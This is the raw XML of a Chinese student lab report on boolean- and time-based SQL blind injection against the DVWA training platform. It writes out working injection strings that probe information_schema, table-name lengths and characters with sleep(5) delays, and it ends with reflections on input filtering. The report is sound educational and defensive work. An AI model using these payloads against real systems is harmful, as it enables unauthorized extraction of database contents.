    <w:p w14:paraId="1B775A94"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1' and (select count(table_name) from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information_schema.tables where table_schema=database())=1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="37352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  <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">不存在 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E07EE"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1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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  <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ACB76D"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118360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="34" name="图片 34" descr="局部截取_20250529_202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局部截取_20250529_2027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2CE4">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据库中共有两个表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54376AA2"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  <w:t>接着挨个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>猜解表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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  <w:t xml:space="preserve">： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B78C72"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1' and length(substr((select table_name from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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information_schema.tables where table_schema=database() limit 0,1),1))=1 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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  <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">不存在 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C40DBE7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="37352F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>1' and length(substr((select table_name from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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information_schema.tables where table_schema=database() limit 0,1),1))=2 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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  <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">不存在 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2ABFA"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7352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="MicrosoftYaHei-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55526D18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9230" cy="1793240"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10160"/>
            <wp:docPr id="35" name="图片 35" descr="局部截取_20250529_20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局部截取_20250529_2029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0999CE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所以第一个表名长度为9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E86925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然后再用同猜数据库名的方法猜表名。最终得到两个表名：guestbook和users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B043B4C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部分过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336AC48C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517775"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="36" name="图片 36" descr="局部截取_20250529_20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局部截取_20250529_2033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5AC3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1758950"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6350"/>
            <wp:docPr id="37" name="图片 37" descr="局部截取_20250529_20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局部截取_20250529_2033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42CC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773555"/>
            <wp:effectExtent l="0" t="0" r="635" b="4445"/>
            <wp:docPr id="38" name="图片 38" descr="局部截取_20250529_20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局部截取_20250529_2035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92BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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猜字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAEA15E">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>继续用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>相同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>法，重复上述所有步骤，即可猜解出所有表的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF0A9A"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三．基于时间的SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB81508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 1' and sleep(5)#，感觉到明显延迟；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF098DA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输入1 and sleep(5) # ，没有延迟。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67905BB5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说明存在字符型的基于时间的SQL盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2B601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猜解当前数据库名字长度：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF27ABB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1'and if(length(database())=1,sleep(5),1#,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56680045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1' and if(length(database())=4,sleep(5),1)#，明显延迟。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EC9D1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采用二分法猜解数据库名：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF1DFB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1' and if(ascii(substr(database(),1,1))&gt;97,sleep(5),1)#，明显延迟。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20269C72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以此类推，猜解表、字段和数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA2FD8"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 w14:paraId="4DCF887A">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过本次 SQL 盲注实验，我深入理解了盲注攻击的原理与实践。在布尔盲注中，学会通过构造逻辑表达式（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1' and 1=1#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）观察页面返回差异来判断注入点类型，再利用length()和ascii()函数结合二分法逐步猜解数据库名、表名及字段名，这让我认识到未过滤用户输入的危害性 —— 程序直接拼接用户输入到 SQL 语句中（如实验源码中$getid = "SELECT... '$id' "），为攻击提供了可乘之机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539EF07">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时间盲注则通过sleep()函数验证延迟差异，进一步体会到攻击者可利用时间损耗特征绕过无回显场景的限制。实验中配置 OWASP 虚拟机环境并操作 DVWA 平台的过程，也增强了我对漏洞复现流程的实操能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C3A789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此次实践不仅巩固了 SQL 语法与注入技巧，更深刻理解了安全编码的重要性 —— 对用户输入进行严格过滤和转义是防范 SQL 注入的关键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485601E6">
      <w:pPr>
        <w:bidi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YaHei-Bold">
    <w:altName w:val="ksdb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sdb">
    <w:panose1 w:val="02000500000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001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FF6F2B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C0FF6F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2BF881"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="002BF8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F09CA45"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4F09CA4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1D9415D"/>
    <w:rsid w:val="04333FF8"/>
    <w:rsid w:val="0ACB4562"/>
    <w:rsid w:val="12492C39"/>
    <w:rsid w:val="1FE91339"/>
    <w:rsid w:val="2AB80146"/>
    <w:rsid w:val="30C44C4C"/>
    <w:rsid w:val="36A302BA"/>
    <w:rsid w:val="3BC91D58"/>
    <w:rsid w:val="57ED4158"/>
    <w:rsid w:val="62BD60DC"/>
    <w:rsid w:val="6B41497B"/>
    <w:rsid w:val="6D6668C3"/>
    <w:rsid w:val="729E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560" w:firstLineChars="20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1">
    <w:name w:val="页眉 Char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Char"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="4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12</Pages>
  <Words>1405</Words>
  <Characters>2757</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>111</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2995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WPS_1701907429</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-29T12:44:03Z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eyJoZGlkIjoiZjFmZWIzNDg2MmIzZjExOTIzMmViNTBmYTMwYTk0ZWYiLCJ1c2VySWQiOiIxNTY3MDU5MTI0In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.21171</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>B1D6B6B7DBC3473EB8A9DF8B68888C6D_12</vt:lpwstr>
  </property>
</Properties>
</file>